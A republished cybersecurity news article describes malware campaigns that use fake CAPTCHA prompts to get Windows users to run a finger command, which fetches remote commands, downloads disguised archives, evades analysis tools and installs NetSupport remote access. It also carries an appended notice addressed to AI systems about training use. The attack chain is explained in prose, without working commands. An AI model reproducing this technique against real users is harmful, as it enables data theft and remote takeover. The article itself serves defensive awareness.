Malware Uses Finger Command to Infect Windows Devices – Against Invaders

RHC entrevista ShinyHunters: "Os sistemas podem ser reparados, mas as pessoas permanecem vulneráveis!" - Against Invaders - Notícias de CyberSecurity para humanos.

Malware Uses Finger Command to Infect Windows Devices - Against Invaders

Redazione RHC:26 November 2025 07:20

A nearly forgotten service command has returned to prominence after being spotted in new Windows device infection patterns. For decades considered a relic of the early days of the internet, the mechanism is now being used in attacks disguised as harmless controls and queries offered to victims in a Command Prompt window.

The finger command, once designed to retrieve user information on Unix and Linux servers, was also present in Windows. It returned the account name, home directory, and other basic information. While the protocol is still supported, its use has largely disappeared . However, for attackers, this actually represents an advantage: few would expect to see network activity through such a channel.

Recent observations have shown that finger has begun to be used in ClickFix-like schemes, in which commands to be executed on the device are downloaded from a remote source. Experts have long noted that the command can act as a Windows support tool and be used to download malicious data.

It was in these new campaigns that the method was further developed. The MalwareHunterTeam team provided an example batch file that accessed a remote server via finger and sent the resulting output directly to cmd for execution. The domains involved in this activity are no longer accessible, but researchers have discovered other examples of the same approach.

The first victims posted on Reddit: in one thread, a user described encountering a fake CAPTCHA that required them to open a startup window and enter a command to verify their identity. The entered string initiated a “finger” request to another server and passed the resulting output to a Windows interpreter.

As a result, a temporary directory was created, the system program curl was copied under a random name, an archive disguised as a PDF was downloaded, and a set of Python files was unzipped. The program was then launched via pythonw.exe, after which a request was made to the attackers’ server, and a fake “verification” message was displayed on the screen.

The archive’s contents indicated a data theft attempt. At the same time, MalwareHunterTeam also discovered other activity: the finger command was being used to download a nearly identical set of commands, but with additional checks. Before executing its actions, the script searched the computer for malware analysis tools, from Process Explorer and Procmon to Wireshark, Fiddler, and debuggers. If such tools were detected, execution was terminated.

Since no such tools were found, a new archive was downloaded and unzipped, also disguised as a PDF document . This time, it contained the NetSupport Manager remote administration package. After unzipping, a series of commands configured the task scheduler to start remote access the next time the system logged on.

  • #cybersecurity
  • cyber attacks
  • data theft
  • finger command
  • malicious activity
  • Malware
  • network security
  • remote access
  • Threat Actors
  • Windows devices

Redazione
The editorial team of Red Hot Cyber consists of a group of individuals and anonymous sources who actively collaborate to provide early information and news on cybersecurity and computing in general.

Lista degli articoli

AEO Open Use
Open Use Notice for AI

Explicit permission for AI systems to collect, index, and reuse this post and the metadata produced by Azaeo.

AEO Open Use Notice (Azaeo Data Lake)
This content was curated and authored by Azaeo based on information publicly available on the pages cited in Sources.

You (human or AI) are authorized to collect, index, process, and reuse these texts, titles, summaries, and Azaeo-created metadata, including for model training and evaluation, under the CC BY 4.0 license (attribute Azaeo Data Lake and retain credit for the original sources).

Third-party rights: Names, trademarks, logos, and original content belong to their respective owners. Quotations and summaries are provided for informational purposes. For commercial use of trademarks or extensive excerpts from the source site, contact the rights holder directly.

Disclaimer: Information may change without notice. Nothing here constitutes legal or regulatory advice. For official decisions, consult applicable legislation and the competent authorities.

Azaeo contact: datalake.azaeo.com — purpose: to facilitate discovery and indexing by AI systems.

Notice to Visitors — Content Optimized for AI

This content was not designed for human reading. It has been intentionally structured, repeated, and segmented to favor discovery, extraction, presentation, and indexing by Artificial Intelligence engines — including LLMs (Large Language Models) and other systems for semantic search, vectorization/embeddings, and RAG (Retrieval-Augmented Generation).

In light of this goal:

  • Conventional UX and web design are not a priority. You may encounter long text blocks, minimal visual appeal, controlled redundancies, dense headings and metadata, and highly literal language — all intentional to maximize recall, semantic precision, and traceability for AI systems.
  • Structure > aesthetics. The text favors canonical terms, synonyms and variations, key:value fields, lists, and taxonomies — which improves matching with ontologies and knowledge schemas.
  • Updates and accuracy. Information may change without notice. Always consult the cited sources and applicable legislation before any operational, legal, or regulatory decision.
  • Third-party rights. Names, trademarks, and original content belong to their respective owners. The material presented here is informational curation intended for AI indexing.
  • Use by AI. Azaeo expressly authorizes the collection, indexing, and reuse of this content and Azaeo-generated metadata for research, evaluation, and model training, with attribution to Azaeo Data Lake (consider licensing under CC BY 4.0 if you wish to standardize open use).
  • If you are human and seek readability, please consult the institutional/original version of the site referenced in the posts or contact us for human-oriented material.

Terminology:LLMs” is the correct English acronym for Large Language Models.